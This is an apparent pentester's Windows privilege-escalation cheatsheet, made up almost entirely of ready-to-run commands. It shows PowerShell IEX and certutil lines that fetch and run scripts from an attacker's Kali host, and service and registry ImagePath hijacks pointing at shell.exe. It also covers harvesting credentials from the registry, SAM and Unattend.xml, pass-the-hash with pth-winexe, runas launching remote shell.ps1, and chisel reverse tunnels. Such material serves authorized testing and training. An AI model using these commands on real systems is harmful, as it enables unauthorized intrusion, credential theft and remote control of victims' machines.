Win Priv Esc II
Windows Privilege Escalation Cheatsheet
So you got a shell, what now?
This post will help you with local enumeration as well as escalate your privileges further.
Usage of different enumeration scripts and tools is encouraged, my favourite is WinPEAS. If confused which executable to use, use this
Keep in mind:
To exploit services or registry, you require:
appropriate write permissions
service start permission
service stop permission
Look for non-standard programs on the system
Note: This is a live document. I’ll be adding more content as I learn more
Binaries
Get 64-bit netcat from here
Get Chisel from here
General Information
# If nothing is specified, assume command can be run on cmd.exe or powershell.exe
whoami
echo%username%
whoami /all
hostname
echo%hostname%
net users
net users username
# Note hostname, patches, architecture
systeminfo
# Both should be the same for ease of exploitation
# PowerShell
# Make a 64-bit shell using nc64.exe
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
# Check LanguageMode (FullLanguage is nicer to have)
$ExecutionContext.SessionState.LanguageMode
# Check AppLocker policy
Get-AppLockerPolicy-Effective
# View RuleCollections in detail
Get-AppLockerPolicy-Effective| select-ExpandedPropertyRuleCollections
# all, addresses:port, PID
netstat -ano
File Transfer
# On KALI
# use double-quotes if file path has spaces in it
sudo impacket-smbserverabcd /path/to/serve
# mount drives
net use abcd: \\kali_ip\myshare
net use abcd: /d # disconnect
net use abcd: /delete # then delete
# PowerShell
New-PSDrive-Name"abcd"-PSProvider"FileSystem"-Root"\\ip\abcd"
Remove-PSDrive-Nameabcd
# OR copy directly from the share without mounting
copy//kali_ip/abcd/file_name C:\path\to\save
copyC:\path\to\file //kali_ip/abcd
copy"C:\Program Files\..\legit.exe"C:\Temp
copy/Y C:\Downloads\shell.exe "C:\Program Files\...\legit.exe"
# Download to Windows
# Load script in memory
powershell.exe -nop-epbypass -c"IEX(New-Object Net.WebClient).DownloadString('http://ip/file')"
powershell.exe iex(iwrhttp://ip/file -usebasicparsing)
# Save script on disk
powershell.exe -nop-epbypass -c"IEX(New-Object Net.WebClient).DownloadFile('http://ip/file','C:\Users\Public\Downloads\file')"
powershell.exe -nop-epbypass -c"IWR -URI 'http://ip/file' -Outfile '/path/to/file'"
certutil -urlcache-fhttp://kali_ip/file file
Automated Enumeration
# Run winPEAS
# For color:
# > REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
# > cmd.exe
.\winpeasany.exe quiet
Accesschk
# .\accesschk.exe /accepteula
# -c : Name a windows service, or use * for all
# -d : Only process directories
# -k : Name a registry key e.g., hklm/software
# -q : Omit banner
# -s : Recurse
# -u : Suppress errors
# -v : Verbose
# -w : Show objects with write access
# Check service permissions
# ALWAYS RUN THE FOLLOWING TO CHECK IF YOU'VE PERMISSIONS TO START AND STOP THE SERVICE
.\accesschk.exe /accepteula -ucqv<user> <svc_name>
# Get all writable services as per groups
.\accesschk.exe /accepteual -uwcqvUsers *
.\accesschk.exe /accepteula -uwcqv"Authenticated Users"*
# Is dir writable? - Unquoted service paths
.\accesschk.exe /accepteula -uwdv"C:\Program Files"
# User permissions on an executable
.\accesschk.exe /accepteula -uqv"C:\Program Files\...\file.exe"
# Find all weak permissions - folders
.\accesschk.exe /accepteula -uwdqsUsers c:\
.\accesschk.exe /accepteula -uwdqs"Authenticated Users"c:\
# Find all weak permissions - files
.\accesschk.exe /accepteula -uwqsUsers c:\*.*
.\accesschk.exe /accepteula -uwqs"Authenticated Users"c:\*.*
# Registry ACL - Weak registry permissions
.\accesschk.exe /accepteula -uvwqkHKLM\System\CurrentControlSet\Services\svc_name
# PowerShell
Get-AclHKLM\System\CurrentControlSet\Services\svc_name | Format-List
# Get rights of any file, or folder
# PowerShell
(get-aclC:\path\to\file).access | ftIdentityReference,FileSystemRights,AccessControlType
sc.exe
# Query service configuration
# Verify after doing all the changes
scqc svc
# Current state of the service
scquery svc
# Modify config
scconfig svc binpath= "\"C:\Downloads\shell.exe\""
# if dependencies exist
scconfig depend_svc start= auto
net startdepend_svc
net startsvc
# can instead remove dependency too
scconfig svc depend= ""
# Start/stop the service
net start/stop svc
Registry
# Query configuration of registry entry of the service
reg query HKLM\System\CurrentControlSet\Services\svc_name
# Point the ImagePath to malicious executable
reg add HKLM\SYSTEM\CurrentControlSet\services\svc_name /v ImagePath /t REG_EXPAND_SZ /d C:\path\shell.exe /f
# Start/stop the service to get the shell
net start/stop svc
# Execute a reverse_shell.msi as admin
# Manually, both query's output should be 0x1 to exploit
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Credentials or Hashes
# Common creds location, always in plaintext
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogin"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"/s
# If found, prints the location of the file
dir/s <filename> # or extensions
dir/s SAM
dir/s SYSTEM
dir/s Unattend.xml
# Found creds?
# On KALI
# --system only works if admin creds are on hand
winexe -U'admin%pass123'[--system] //10.10.10.10cmd.exe
# Found hash?
pth-winexe-U'domain\admin%LM:NTLM'[--system] //10.10.10.10cmd.exe
RunAs
# cmd
runas /savecred /user:admin C:\abcd\reverse.exe
# PowerShell Runas 1
$password= ConvertTo-SecureString'pass123'-AsPlainText-Force
$cred= New-ObjectSystem.Management.Automation.PSCredential('Administrator', $password)
Start-Process-FilePath"powershell"-argumentlist"IEX(New-Object Net.WebClient).downloadString('http://kali_ip/shell.ps1')"-Credential$cred
# PowerShell Runas 2
$username= "domain\Administrator"
$password= "pass123"
$secstr= New-Object-TypeNameSystem.Security.SecureString
$password.ToCharArray() | ForEach-Object{$secstr.AppendChar($_)}
$cred= new-object-typenameSystem.Management.Automation.PSCredential -argumentlist$username, $secstr
Invoke-Command-ScriptBlock{ IEX(New-ObjectNet.WebClient).downloadString('http://10.10.14.16/shell.ps1') } -Credential$cred-Computerlocalhost
Find Files Fast
dir/s <filename> # or extensions
Get-ChildItem-PathC:\ -Include*filename_wildcard* -Recurse-ErrorActionSilentlyContinue
Port Forwarding
# If some port are listening on the target machine but inaccessible, forward the ports - Port Forwarding
# winexe, pth-winexe, smbexec.py, psexec works on 445, MySQL on 3306
# On KALI
./chisel server --reverse--port9001
# On Windows
.\chisel.exe client KALI_IP:9001R:KALI_PORT:127.0.0.1:WINDOWS_PORT
# Example --> .\chisel.exe client KALI_IP:9001 R:445:127.0.0.1:445
# On KALI
winexe -U'administrator%pass123'--system//127.0.0.1KALI_PORT
smbexec.py domain/username:password@127.0.0.1
mysql --host=127.0.0.1--port=KALI_PORT -uusername -p
Exploit suggester
Windows exploit suggester can be found here
# On KALI
# Find exploits
# .\windows-exploit-suggester.py --update
.\windows-exploit-suggester.py -isysteminfo.txt -d2020-xxx.xlsx
Last updated
